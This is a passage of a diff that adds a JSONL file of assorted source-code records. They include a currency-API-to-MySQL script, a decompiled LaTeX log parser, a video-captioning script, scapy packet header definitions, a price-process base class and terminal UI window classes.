diff --git "a/3539.jsonl" "b/3539.jsonl" new file mode 100644--- /dev/null +++ "b/3539.jsonl" @@ -0,0 +1,748 @@ +{"seq_id":"183534305","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport MySQLdb\nfrom datetime import *\n\ndef output_currency():\n\tcurrency = 'JPY'\n\tdatas = []\n\turl_currency = 'http://data.fixer.io/api/latest?access_key=__value__'\n\tapi_data = requests.get(url_currency).json()\n\tif api_data['success'] == True:\n\t\tdt = datetime.fromtimestamp( api_data['timestamp'] )\n\t\tcr = round(api_data['rates'][currency], 2)\n\t\tdatas.append([dt,cr,currency])\n\t\tprint(datas)\n\telse:\n\t\tprint('failed')\n\n\tsqtbl = 'api_currency' #table name\n\n\tconn = MySQLdb.connect(host = '__value__', db = '__value__', user = '__value__', password = '__value__', charset = 'utf8mb4')\n\tc = conn.cursor()\n\n\tc.execute('drop table if exists ' + sqtbl) #initialize\n\tc.execute('create table ' + sqtbl + '(Date datetime, Rate float, Currency text)')\n\n\tc.executemany('insert into ' + sqtbl + ' values (%s,%s,%s)',datas)\n\n\tconn.commit()\n\n\tc.execute('select * from ' + sqtbl + ' order by Date desc limit 10;')\n\tfor rowsql in c.fetchall():\n\t\tprint(rowsql)\n\tprint('')\n\n\tconn.close()\n\noutput_currency()\n","sub_path":"api/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"174050154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dbtexmf/dblatex/grubber/logparser.py\n# Compiled at: 2017-04-03 18:58:57\n\"\"\"\nLaTeX document building system for Rubber.\n\nThis module defines the class that parses the LaTeX log files.\n\"\"\"\nfrom __future__ import generators\nimport re\nfrom msg import _, msg\n\nclass LogParser:\n \"\"\"\n This class performs all the extraction of information from the log file.\n For efficiency, the instances contain the whole file as a list of strings\n so that it can be read several times with no disk access.\n \"\"\"\n re_loghead = re.compile('This is [0-9a-zA-Z-]*(TeX|Omega)')\n re_rerun = re.compile('(LaTeX|Package longtable|Package bibtopic) Warning:.*Rerun')\n re_rerun2 = re.compile('\\\\(Changebar\\\\).*Rerun')\n re_file = re.compile('(\\\\((?P[^ \\n\\t(){}]*)|\\\\))')\n re_badbox = re.compile('(Ov|Und)erfull \\\\\\\\[hv]box ')\n re_line = re.compile('(l\\\\.(?P[0-9]+)( (?P.*))?$|<\\\\*>)')\n re_cseq = re.compile('.*(?P\\\\\\\\[^ ]*) ?$')\n re_page = re.compile('\\\\[(?P[0-9]+)\\\\]')\n re_atline = re.compile('( detected| in paragraph)? at lines? (?P[0-9]*)(--(?P[0-9]*))?')\n re_reference = re.compile(\"LaTeX Warning: Reference `(?P.*)' on page (?P[0-9]*) undefined on input line (?P[0-9]*)\\\\.$\")\n re_label = re.compile('LaTeX Warning: (?PLabel .*)$')\n re_warning = re.compile('(LaTeX|Package)( (?P.*))? Warning: (?P.*)$')\n re_online = re.compile('(; reported)? on input line (?P[0-9]*)')\n re_ignored = re.compile('; all text was ignored after line (?P[0-9]*).$')\n re_misschar = re.compile('Missing character: There is no (?P[^ ]*) in font (?P.*)!')\n\n def __init__(self):\n self.lines = []\n\n def read(self, name):\n \"\"\"\n Read the specified log file, checking that it was produced by the\n right compiler. 
Returns true if the log file is invalid or does not\n exist.\n \"\"\"\n self.lines = []\n try:\n file = open(name)\n except IOError:\n return 2\n\n line = file.readline()\n if not line:\n file.close()\n return 1\n if not self.re_loghead.match(line):\n file.close()\n return 1\n self.lines = file.readlines()\n file.close()\n return 0\n\n def errors(self):\n \"\"\"\n Returns true if there was an error during the compilation.\n \"\"\"\n skipping = 0\n for line in self.lines:\n if line.strip() == '':\n skipping = 0\n continue\n if skipping:\n continue\n m = self.re_badbox.match(line)\n if m:\n skipping = 1\n continue\n if line[0] == '!':\n if line.find('pdfTeX warning') == -1:\n return 1\n\n return 0\n\n def run_needed(self):\n \"\"\"\n Returns true if LaTeX indicated that another compilation is needed.\n \"\"\"\n for line in self.lines:\n if self.re_rerun.match(line):\n return 1\n if self.re_rerun2.match(line):\n return 1\n\n return 0\n\n def continued(self, line):\n \"\"\"\n Check if a line in the log is continued on the next line. This is\n needed because TeX breaks messages at 79 characters per line. We make\n this into a method because the test is slightly different in Metapost.\n \"\"\"\n return len(line) == 79\n\n def parse(self, errors=0, boxes=0, refs=0, warnings=0, misschars=0):\n \"\"\"\n Parse the log file for relevant information. The named arguments are\n booleans that indicate which information should be extracted:\n - errors: all errors\n - boxes: bad boxes\n - refs: warnings about references\n - warnings: all other warnings\n The function returns a generator. Each generated item is a dictionary\n that contains (some of) the following entries:\n - kind: the kind of information (\"error\", \"box\", \"ref\", \"warning\")\n - text: the text of the error or warning\n - code: the piece of code that caused an error\n - file, line, last, pkg: as used by Message.format_pos.\n \"\"\"\n if not self.lines:\n return\n else:\n last_file = None\n pos = [last_file]\n page = 1\n parsing = 0\n skipping = 0\n something = 0\n prefix = None\n accu = ''\n for line in self.lines:\n line = line[:-1]\n if self.continued(line):\n accu += line\n continue\n line = accu + line\n accu = ''\n if prefix is None and line == '':\n skipping = 0\n continue\n if skipping:\n continue\n if parsing:\n if error == 'Undefined control sequence.':\n m = self.re_cseq.match(line)\n if m:\n error = 'Undefined control sequence %s.' 
% m.group('seq')\n m = self.re_line.match(line)\n if m:\n parsing = 0\n skipping = 1\n pdfTeX = error.find('pdfTeX warning') != -1\n if pdfTeX and warnings or errors and not pdfTeX:\n if pdfTeX:\n d = {'kind': 'warning', 'pkg': 'pdfTeX', \n 'text': error[error.find(':') + 2:]}\n else:\n d = {'kind': 'error', 'text': error}\n d.update(m.groupdict())\n m = self.re_ignored.search(error)\n if m:\n d['file'] = last_file\n if d.has_key('code'):\n del d['code']\n d.update(m.groupdict())\n elif pos[(-1)] is None:\n d['file'] = last_file\n else:\n d['file'] = pos[(-1)]\n yield d\n elif line[0] == '!':\n error = line[2:]\n elif line[0:3] == '***':\n parsing = 0\n skipping = 1\n if errors:\n yield {'kind': 'abort', 'text': error, \n 'why': line[4:], \n 'file': last_file}\n elif line[0:15] == 'Type X to quit ':\n parsing = 0\n skipping = 0\n if errors:\n yield {'kind': 'error', 'text': error, \n 'file': pos[(-1)]}\n continue\n if len(line) > 0 and line[0] == '!':\n error = line[2:]\n parsing = 1\n continue\n if line == 'Runaway argument?':\n error = line\n parsing = 1\n continue\n if prefix is not None:\n if line[:len(prefix)] == prefix:\n text.append(line[len(prefix):].strip())\n else:\n text = (' ').join(text)\n m = self.re_online.search(text)\n if m:\n info['line'] = m.group('line')\n text = text[:m.start()] + text[m.end():]\n if warnings:\n info['text'] = text\n d = {'kind': 'warning'}\n d.update(info)\n yield d\n prefix = None\n continue\n m = self.re_reference.match(line)\n if m:\n if refs:\n d = {'kind': 'warning', 'text': _(\"Reference `%s' undefined.\") % m.group('ref'), \n 'file': pos[(-1)]}\n d.update(m.groupdict())\n yield d\n continue\n m = self.re_label.match(line)\n if m:\n if refs:\n d = {'kind': 'warning', 'file': pos[(-1)]}\n d.update(m.groupdict())\n yield d\n continue\n if line.find('Warning') != -1:\n m = self.re_warning.match(line)\n if m:\n info = m.groupdict()\n info['file'] = pos[(-1)]\n info['page'] = page\n if info['pkg'] is None:\n del info['pkg']\n prefix = ''\n else:\n prefix = '(%s)' % info['pkg']\n prefix = prefix.ljust(m.start('text'))\n text = [info['text']]\n continue\n m = self.re_badbox.match(line)\n if m:\n if boxes:\n mpos = {'file': pos[(-1)], 'page': page}\n m = self.re_atline.search(line)\n if m:\n md = m.groupdict()\n for key in ('line', 'last'):\n if md[key]:\n mpos[key] = md[key]\n\n line = line[:m.start()]\n d = {'kind': 'warning', 'text': line}\n d.update(mpos)\n yield d\n skipping = 1\n continue\n if misschars:\n m = self.re_misschar.match(line)\n if m:\n d = {'kind': 'warning', 'uchar': m.group('uchar'), \n 'font': m.group('font')}\n yield d\n continue\n last_file = self.update_file(line, pos, last_file)\n page = self.update_page(line, page)\n\n return\n\n def get_errors(self):\n return self.parse(errors=1)\n\n def get_boxes(self):\n return self.parse(boxes=1)\n\n def get_references(self):\n return self.parse(refs=1)\n\n def get_warnings(self):\n return self.parse(warnings=1)\n\n def get_misschars(self):\n return self.parse(misschars=1)\n\n def update_file(self, line, stack, last):\n \"\"\"\n Parse the given line of log file for file openings and closings and\n update the list `stack'. Newly opened files are at the end, therefore\n stack[1] is the main source while stack[-1] is the current one. The\n first element, stack[0], contains the value None for errors that may\n happen outside the source. 
Return the last file from which text was\n read (the new stack top, or the one before the last closing\n parenthesis).\n \"\"\"\n m = self.re_file.search(line)\n while m:\n if line[m.start()] == '(':\n last = m.group('file')\n stack.append(last)\n else:\n last = stack[(-1)]\n del stack[-1]\n line = line[m.end():]\n m = self.re_file.search(line)\n\n return last\n\n def update_page(self, line, before):\n \"\"\"\n Parse the given line and return the number of the page that is being\n built after that line, assuming the current page before the line was\n `before'.\n \"\"\"\n ms = self.re_page.findall(line)\n if ms == []:\n return before\n return int(ms[(-1)]) + 1","sub_path":"pycfiles/dblatex-0.3.10-py2.7/logparser.py","file_name":"logparser.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270573552","text":"import cv2 \nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport pickle \nimport os\nfrom torchvision import transforms \nfrom build_vocab import Vocabulary\nfrom model import EncoderCNN, DecoderRNN\nfrom PIL import Image,ImageOps\nimport pickle\n\nimport datetime\n\n\n\n# Device configuration\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = torch.device('cpu')\n\nencoder_path = 'models/encoder-5-3000.pkl'\ndecoder_path = 'models/decoder-5-3000.pkl'\nvocab_path = 'data/vocab.pkl'\n\n#image=\nembed_size=256\nhidden_size=512\nnum_layers=1\n\ntransform = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n \n# Load vocabulary wrapper\nwith open(vocab_path, 'rb') as f:\n vocab = pickle.load(f)\n f.close() #NOTE:I think\n\n# Build models\nencoder = EncoderCNN(embed_size).eval() # eval mode (batchnorm uses moving mean/variance)\ndecoder = DecoderRNN(embed_size, hidden_size, len(vocab), num_layers)\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\n\n# Load the trained model parameters\nencoder.load_state_dict(torch.load(encoder_path))\ndecoder.load_state_dict(torch.load(decoder_path))\n\n\n#vid_path = \"./data/1374258965.mp4\"\n\ndef main(args, fldr):\n # print(args.vid_path)\n vid = cv2.VideoCapture(args.vid_path) \n\n count = 0\n success = 1\n captions =[]\n count = 0\n while success:\n success, image = vid.read()\n cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n count += 1\n if count%100 == 0:\n\n cv2.imwrite(\"./\" + fldr + \"/frames/frame%d.jpg\" % count, image)\n\n \n image = Image.fromarray(image)\n \n image.save(\"./\" + fldr + \"/frames/frame%d.jpg\" % count)\n resized_image = image.resize([224, 224], Image.LANCZOS)\n trans_image = transform(resized_image).unsqueeze(0)\n\n image_tensor = trans_image.to(device)\n feature = encoder(image_tensor)\n sampled_ids = decoder.sample(feature)\n sampled_ids = sampled_ids[0].cpu().numpy()# (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n sentence = ' '.join(sampled_caption)\n\n # Print out the image and the generated caption\n print (sentence)\n text_file = open(\"./\" + fldr + \"/captions/caption%d.txt\" % count, \"w\")\n text_file.write(sentence)\n text_file.close()\n\n plt.imshow(np.asarray(image))\n\n # cv2.imwrite(\"./frames/frame%d.jpg\" % count, image) \n \nif __name__ == '__main__':\n fldr = str(datetime.datetime.now())\n 
os.mkdir(fldr)\n os.mkdir(fldr + \"/frames/\")\n os.mkdir(fldr + \"/captions/\")\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--vid_path', type=str, required=True, help='input image for generating caption')\n args = parser.parse_args()\n main(args, fldr)\n\n \n#ODEN https://vimeo.com/channels/staffpicks/8191217 \n \n''' \npython run_squad.py \\\n --vocab_file=$../uncased_L-24_H-1024_A-16/vocab.txt \\\n --bert_config_file=$../uncased_L-24_H-1024_A-16/bert_config.json \\\n --init_checkpoint=$../uncased_L-24_H-1024_A-16/bert_model.ckpt \\\n --do_train=True \\\n --train_file=$SQUAD_DIR/train-v1.1.json \\\n --do_predict=True \\\n --predict_file=$SQUAD_DIR/dev-v1.1.json \\\n --train_batch_size=24 \\\n --learning_rate=3e-5 \\\n --num_train_epochs=2.0 \\\n --max_seq_length=384 \\\n --doc_stride=128 \\\n --output_dir=gs://some_bucket/squad_large/ \\\n --use_tpu=False\n \npython run_squad.py \\\n --vocab_file=../uncased_L-24_H-1024_A-16/vocab.txt\\\n --bert_config_file=../uncased_L-24_H-1024_A-16/bert_config.json\\\n --init_checkpoint=../uncased_L-24_H-1024_A-16/bert_model.ckpt\\\n --do_train=True \\\n --train_file=../SQUAD_DIR/train-v2.0.json\\\n --do_predict=True \\\n --predict_file=../SQUAD_DIR/dev-v2.0.json\\\n --train_batch_size=24 \\\n --learning_rate=3e-5 \\\n --num_train_epochs=2.0 \\\n --max_seq_length=384 \\\n --doc_stride=128 \\\n --output_dir=../output\\\n --use_tpu=False \\\n --version_2_with_negative=True\n '''","sub_path":".ipynb_checkpoints/video_sampling-checkpoint.py","file_name":"video_sampling-checkpoint.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"396254367","text":"from scapy.all import *\n\n##class definitions\nclass Ethernet(Packet):\n\tname = 'ethernet'\n\tfields_desc = [\n\t\tXBitField(dstAddr, 0, 48),\n\t\tXBitField(srcAddr, 0, 48),\n\t\tShortField(etherType, 0),\n\t]\nclass Ipv4(Packet):\n\tname = 'ipv4'\n\tfields_desc = [\n\t\tXBitField(version, 0, 4),\n\t\tXBitField(ihl, 0, 4),\n\t\tByteField(diffserv, 0),\n\t\tShortField(totalLen, 0),\n\t\tShortField(identification, 0),\n\t\tXBitField(flags, 0, 3),\n\t\tXBitField(fragOffset, 0, 13),\n\t\tByteField(ttl, 0),\n\t\tByteField(protocol, 0),\n\t\tShortField(hdrChecksum, 0),\n\t\tIntField(srcAddr, 0),\n\t\tIntField(dstAddr, 0),\n\t]\n\t#update hdrChecksum over [[u'ipv4', u'version'], [u'ipv4', u'ihl'], [u'ipv4', u'diffserv'], [u'ipv4', u'totalLen'], [u'ipv4', u'identification'], [u'ipv4', u'flags'], [u'ipv4', u'fragOffset'], [u'ipv4', u'ttl'], [u'ipv4', u'protocol'], [u'ipv4', u'srcAddr'], [u'ipv4', u'dstAddr']] using csum16 in post_build method\n\n\n##bindings\nbind_layers(Ethernet, Ipv4, etherType = 0x0800)\n\n##packet_list\npossible_packets = [\n\t(Ethernet()),\n\t(Ethernet()/Ipv4())\n]\n","sub_path":"samples/ipv4_forward/output/scapy/ipv4_forward.py","file_name":"ipv4_forward.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556615998","text":"from __future__ import division\n\nimport datetime\nfrom abc import ABCMeta, abstractmethod\nimport six\n\nDAYS_PER_YEAR = 365\nSECONDS_PER_DAY = 86400\n\n\nclass PriceProcess(six.with_metaclass(ABCMeta)):\n\n @abstractmethod\n def simulate_future_prices(self, observation_date, requirements, path_count, calibration_params):\n \"\"\"\n Returns a generator that yields a sequence of simulated prices.\n \"\"\"\n\n def get_commodity_names_and_fixing_dates(self, 
observation_date, requirements):\n # Get an ordered list of all the commodity names and fixing dates.\n commodity_names = sorted(set([r[0] for r in requirements]))\n observation_date = datetime_from_date(observation_date)\n\n requirement_datetimes = [datetime_from_date(r[1]) for r in requirements]\n\n fixing_dates = sorted(set([observation_date] + requirement_datetimes))\n return commodity_names, fixing_dates\n\n\ndef get_duration_years(start_date, end_date, days_per_year=DAYS_PER_YEAR):\n try:\n time_delta = datetime_from_date(end_date) - datetime_from_date(start_date)\n except TypeError as inst:\n raise TypeError(\"%s: start: %s end: %s\" % (inst, start_date, end_date))\n return time_delta.total_seconds() / float(days_per_year * SECONDS_PER_DAY)\n\n\ndef datetime_from_date(observation_date):\n if isinstance(observation_date, datetime.date):\n return datetime.datetime(observation_date.year, observation_date.month, observation_date.day)\n else:\n return observation_date\n","sub_path":"quantdsl/priceprocess/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444604895","text":"import abc\nfrom collections.abc import Iterable\nfrom .app import App\nfrom .string_buffer import StringBuffer\n# from .control import Button\n\nclass Window:\n main_wnd = None\n handle = -1\n term = None\n\n debug = open('debug.log', 'w')\n\n def __init__(self):\n # self.term = Terminal()\n app = App()\n self.term = app.term\n self.background_clr = 'cyan' # \"magenta\"\n self.text_clr = \"white\"\n\n app = App()\n self.screen = app.screen\n\n @abc.abstractmethod\n def set_base_corner(self, x=0, y=0): ...\n\n @abc.abstractmethod\n def set_right_corner(self, x, y): ...\n\n @abc.abstractmethod\n def set_parent(self, parent=None): ...\n\n @abc.abstractmethod\n def run(self, key=None) -> int: ...\n\n @abc.abstractmethod\n def render(self): ...\n\n @abc.abstractmethod\n def on_resize(self, sig, action): ...\n\n @abc.abstractmethod\n def on_paint(self): ...\n\n @abc.abstractmethod\n def on_focus(self, focus: bool = False): ...\n\n @abc.abstractmethod\n def add_main_menu(self, menu): ...\n\n def set_main_wnd(self, mainwnd):\n self.main_wnd = mainwnd\n\n @abc.abstractmethod\n def _focused_sub_wnd(self, handle, sub, focus=True) -> int: ...\n\n @abc.abstractmethod\n def child_lose_focus(self): ...\n\n @abc.abstractmethod\n def is_menu(self) -> bool: ...\n\n def set_handle(self, handle: int = -1):\n self.handle = handle\n\nclass MainWindow(Window):\n\n string_buffer = None\n\n def __init__(self):\n super().__init__()\n # self.term = Terminal()\n height, width = self.term.height, self.term.width\n\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n self.background_clr = 'darkgrey' #'cyan' # \"magenta\"\n self.main_menu = None\n self.main_menu_key = \"KEY_F9\"\n self.wnd_border = True\n self.work_spc_border = True\n self.focus_owner = True\n self.focus = True\n self.main_menu_focus = False\n self.selected_wnd = -1\n self.focused_wnd = None\n self.focused_wnd_handle = -1\n self.next_sub_wnd = ['KEY_TAB', 'KEY_RIGHT']\n self.prev_sub_wnd = ['KEY_LEFT']\n\n self.x = 0\n self.y = 0\n self.rx = width - 1\n self.ry = height - 1\n self.sub_windows = {}\n self.wnd_count = 0\n\n # self.string_buffer = [\"\",]\n # self.cur_pos = 0\n # self.delta = 0\n\n 
self.screen_id = self.screen.bind()\n self.main_wnd = self\n\n self.string_buffer = StringBuffer(self.text_clr, self.background_clr, self.screen, self.screen_id)\n self.work_size()\n\n\n\n def set_base_corner(self, x=0, y=0):\n ...\n\n def get_anchor(self)-> tuple:\n return (0, 0)\n\n def set_parent(self, parent=None):\n ...\n\n def shift_focus(self, direction='right'):\n\n handles = list(self.sub_windows.keys())\n handles.sort()\n\n if len(handles) != 0 and len(handles) > 1:\n\n pos:int = 0\n if direction == 'right':\n pos = handles.index(self.focused_wnd_handle) + 1\n elif direction == 'left':\n pos = handles.index(self.focused_wnd_handle) - 1\n\n if pos == len(handles):\n pos = 0\n\n if pos < 0:\n pos = len(handles) - 1\n\n self.focused_wnd.on_focus(False)\n # self.focused_wnd.on_paint()\n self.echo('handles = ' + str(handles) + ' pos = ' + str(pos) + '\\n')\n self.focused_wnd = self.sub_windows[handles[pos]]\n self.focused_wnd.on_focus(True)\n self.focused_wnd_handle = handles[pos]\n # self.focused_wnd.on_paint()\n self.on_paint()\n\n def work_size(self):\n self.wl_x = self.x\n self.wl_y = self.y\n self.wr_x = self.rx\n self.wr_y = self.ry\n\n if self.wnd_border:\n self.wl_x = self.x + 1\n self.wl_y = self.y + 1\n self.wr_x = self.rx - 1\n self.wr_y = self.ry - 1\n\n if self.main_menu is not None:\n self.wl_y += 1\n\n w = (self.wr_x - self.wl_x)\n h = (self.wr_y - self.wl_y)\n self.string_buffer.set_work_size(self.wl_x, self.wl_y + 1, h, w)\n\n def echo(self, string=None):\n self.string_buffer.print(string)\n self.on_paint()\n\n def is_menu(self) -> bool:\n return False\n\n\n def attach(self, wnd=None):\n handle = self.wnd_count\n if wnd is not None:\n wnd.parent = self\n wnd.main_wnd = self #self.main_wnd\n wnd.handle = handle\n\n self.sub_windows[self.wnd_count] = wnd\n self.wnd_count += 1\n\n def _focused_sub_wnd(self, handle, sub, focus=True) -> int:\n # handle = self.wnd_count\n # if sub is not None:\n # self.sub_windows[self.wnd_count] = sub\n # self.wnd_count += 1\n\n if focus:\n if self.focused_wnd is not None and self.focused_wnd != sub:\n self.focused_wnd.on_focus(False)\n self.focused_wnd = sub\n self.main_menu_focus = False\n self.focus_owner = True\n if self.main_menu is not None:\n self.main_menu.on_focus(False)\n self.focused_wnd_handle = handle\n self.on_paint()\n\n return handle\n\n def _un_bind_window(self, handle=-1):\n handles = list(self.sub_windows.keys())\n handles.sort()\n pos = handles.index(handle)\n self.echo(f'un_bind 1 - {str(handles)}\\n')\n\n try:\n self.sub_windows.pop(handle)\n except KeyError:\n print(f'Window handle \\'{handle}\\' does not exist')\n exit(-1)\n self.focused_wnd.on_focus(False)\n\n next_handle: int = 0\n handles.pop(pos)\n\n if len(handles) != 0:\n if len(handles) == 1:\n next_handle = handles[0]\n else:\n if pos >= len(handles):\n next_handle = handles[0]\n else:\n next_handle = handles[pos]\n self.echo('un bind 2 - ' + str(handles) + str(next_handle) + '\\n')\n self.focused_wnd = self.sub_windows[next_handle]\n self.focused_wnd.on_focus(True)\n self.focused_wnd_handle = next_handle\n else:\n self.focused_wnd = None\n self.on_paint()\n\n def __clear_scr(self):\n height = self.ry - self.y\n width = self.rx - self.x\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n\n for x in range(width):\n for y in range(height):\n # echo(self.term.move_xy(x, y) + f'{scr_back_clr} ')\n self.screen.echo(self.screen_id, x, y, f'{scr_back_clr} {self.term.normal}{scr_back_clr}')\n\n def string_buffer_render(self):\n 
self.string_buffer.string_buffer_render()\n\n def get_string_buffer_symbol(self, x, y):\n return self.string_buffer.get_string_buffer_symbol(x, y)\n\n def window_render(self):\n height = self.ry - self.y\n width = self.rx - self.x\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n # print(self.term.clear())\n\n if self.wnd_border:\n # top corners\n self.screen.echo(self.screen_id, self.x, self.y, f'{scr_back_clr}{self.left_top_corner}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.y, f'{scr_back_clr}{self.right_top_corner}{self.term.normal}{scr_back_clr}')\n\n # bottom corners\n self.screen.echo(self.screen_id, self.x, self.ry, f'{scr_back_clr}{self.left_bottom_corner}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.ry, f'{scr_back_clr}{self.right_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n # lines\n # horizontal lines\n for ii in range(0, width - 1, 1):\n self.screen.echo(self.screen_id, self.x + ii + 1, self.y, f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.x + ii + 1, self.ry, f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # vertical lines\n for ii in range(height - 1):\n self.screen.echo(self.screen_id, self.x, self.y + ii + 1, f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.y + ii + 1, f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n if self.work_spc_border:\n pass\n\n self.string_buffer_render()\n\n if self.main_menu is not None:\n self.main_menu.on_paint()\n\n for k, w in self.sub_windows.items():\n if k != self.focused_wnd_handle:\n w.on_paint()\n\n if self.focused_wnd is not None:\n self.focused_wnd.on_paint()\n\n\n def render(self):\n self.__clear_scr()\n self.window_render()\n\n\n def run(self, key=None):\n # clr = getattr(self.term, 'on_' + self.background_clr)\n # echo(f'{clr}')\n\n self.selection = 0\n\n # res = 0\n\n self.debug.write('main wnd ' + str(key) + f' {key.name}\\n')\n\n if self.focused_wnd is not None and not self.main_menu_focus:\n key = self.focused_wnd.run(key)\n if key is not None and key.is_sequence:\n if key.name == self.main_menu_key: #and res != -1:\n self.focus_owner = not self.focus_owner\n self.main_menu.on_focus(not self.focus_owner)\n self.main_menu_focus = not self.focus_owner\n self.on_paint()\n else:\n if not self.focus_owner and self.main_menu_focus:\n self.main_menu.run(key)\n else:\n if key.name == 'KEY_ENTER':\n return key\n elif key.name in self.next_sub_wnd:\n self.shift_focus(direction='right')\n return None\n elif key.name in self.prev_sub_wnd:\n self.shift_focus(direction='left')\n return None\n else:\n return key\n # self.on_paint()\n return key\n\n def on_resize(self, sig, action):\n height, width = self.term.height, self.term.width\n self.rx = width - 1\n self.ry = height - 1\n self.work_size()\n self.screen.reset()\n self.on_paint()\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def on_focus(self, focus: bool = False):\n pass\n\n def add_main_menu(self, menu):\n self.main_menu = menu\n self.main_menu.set_parent(self)\n self.main_menu.set_main_wnd(self)\n if self.wnd_border:\n self.main_menu.set_base_corner(1, 1)\n else:\n self.main_menu.set_base_corner(0, 0)\n\n\n####################################################################################\n\n\nclass SubWindow(MainWindow):\n\n def __init__(self):\n super().__init__()\n 
self.parent = None\n self.wnd_border = True\n self.background_clr = \"magenta\"\n self.title = \"\"\n self.modal = False # True\n self.escape = [\"KEY_ESCAPE\"] #, \"KEY_LEFT\"]\n self.handle = -1\n self.base_corner = None\n\n self.on_focus_dict = {'left_top_corner':'\\u2554', 'right_top_corner':'\\u2557',\n 'left_bottom_corner':'\\u255A', 'right_bottom_corner':'\\u255D',\n 'hor_line':'\\u2550', 'vert_line':'\\u2551'}\n\n self.not_focus_dict = {'left_top_corner':'\\u250c', 'right_top_corner':'\\u2510',\n 'left_bottom_corner':'\\u2514', 'right_bottom_corner':'\\u2518',\n 'hor_line':'\\u2500', 'vert_line':'\\u2502'}\n\n self.screen_id = self.screen.bind()\n self._display = False\n\n\n def set_base_corner(self, x=0, y=0):\n self.base_corner = (x, y)\n anchor = self.parent.get_anchor()\n self.x = 0\n self.y = 0\n self.screen.set_base_corner(self.screen_id, x + anchor[0], y + anchor[1])\n\n def get_anchor(self)-> tuple:\n anchor = (0, 0)\n if self.parent is not None:\n anchor = self.parent.get_anchor()\n return (self.base_corner[0] + anchor[0], self.base_corner[1] + anchor[1])\n\n def set_right_corner(self, x, y):\n self.rx = x - self.base_corner[0]\n self.ry = y - self.base_corner[1]\n self.work_size()\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n def __clear_scr(self):\n height = self.ry - self.y\n width = self.rx - self.x\n clr = getattr(self.term, 'on_' + self.background_clr)\n for i in range(width):\n for j in range(height):\n self.screen.echo(self.screen_id, i, j, f'{clr} {self.term.normal}{clr}')\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def __change_focus(self):\n if self.focus:\n self.left_top_corner = self.on_focus_dict['left_top_corner']\n self.right_top_corner = self.on_focus_dict['right_top_corner']\n self.left_bottom_corner = self.on_focus_dict['left_bottom_corner']\n self.right_bottom_corner = self.on_focus_dict['right_bottom_corner']\n self.hor_line = self.on_focus_dict['hor_line']\n self.vert_line = self.on_focus_dict['vert_line']\n else:\n self.left_top_corner = self.not_focus_dict['left_top_corner']\n self.right_top_corner = self.not_focus_dict['right_top_corner']\n self.left_bottom_corner = self.not_focus_dict['left_bottom_corner']\n self.right_bottom_corner = self.not_focus_dict['right_bottom_corner']\n self.hor_line = self.not_focus_dict['hor_line']\n self.vert_line = self.not_focus_dict['vert_line']\n\n def on_focus(self, focus: bool = False):\n self.focus = focus\n self.work_size()\n self.__change_focus()\n if self.focus and not self._display:\n self.main_wnd._focused_sub_wnd(self.handle, self, True)\n self._display = True\n\n def render(self):\n self.__clear_scr()\n self.window_render()\n if self.title != \"\":\n title = self.title\n clr = getattr(self.term, 'on_' + self.background_clr)\n title_length = len(self.title)\n width = self.rx - self.x\n pos = int((width - title_length) / 2.)\n self.screen.echo(self.screen_id, pos, 0, f'{clr}{title}{self.term.normal}{clr}')\n\n def __find_key(self, key, keys=None):\n if key is not None and isinstance(keys, Iterable):\n for k in keys:\n if k == keys:\n return True\n return False\n\n def _remove_wnd(self):\n self.main_wnd._un_bind_window(self.handle)\n self.handle = -1\n self._display = False\n self.screen.disable_region(self.screen_id)\n\n def run(self, key=None):\n self.debug.write(f'1 {str(key.encode(\"unicode_escape\"))} -- {key.is_sequence} -- {key.name}\\n')\n if self.focused_wnd is not None and not self.main_menu_focus:\n key = self.focused_wnd.run(key)\n 
